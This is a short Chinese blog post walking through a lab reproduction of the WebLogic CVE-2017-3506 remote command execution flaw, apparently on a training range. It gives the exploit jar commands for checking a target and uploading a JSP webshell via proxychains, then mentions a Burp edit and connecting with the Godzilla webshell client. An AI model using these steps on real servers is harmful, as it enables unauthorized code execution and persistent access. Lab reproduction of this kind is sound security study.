0
点赞
收藏
分享

微信扫一扫

【精选】WebLogic-CVE-2017-3506

路西法阁下 2023-12-06 阅读 44
linux运维服务器web安全红日cve

下载地址:

https://github.com/Al1ex/CVE-2017-3506icon-default.png?t=N7T8https://github.com/Al1ex/CVE-2017-3506

1.weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

复现:

┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar

先进行检测下漏洞是否存在

┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.129:7001

2.burp抓包

记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错

proxychains -f /etc/proxychains4.conf java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.129:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp

用123替换下burp里面的内容,然后进行测试下

3.哥斯拉连接

我们再访问下

举报

相关推荐

weblogic漏洞——CVE-2020-14882

安全

jboss/CVE-2017-7504

上传war包python前端开发

CVE-2017-11882 复现

安全web安全

【web安全】Weblogic CVE-2021-2394 分析

日记本

Tomcat put CVE-2017-12615

tomcatjava

漏洞丨cve2017-11882

f5堆栈5e网络管理网络/安全

CVE-2017-12615漏洞复现

编程编程语言c++

WebLogic CVE-2021-2394 RCE 漏洞分析

日记本

weblogic LDAP远程代码执行 CVE-2021-2109

安全

永恒之蓝(CVE-2017-0144)

安全网络安全tomcat
0 条评论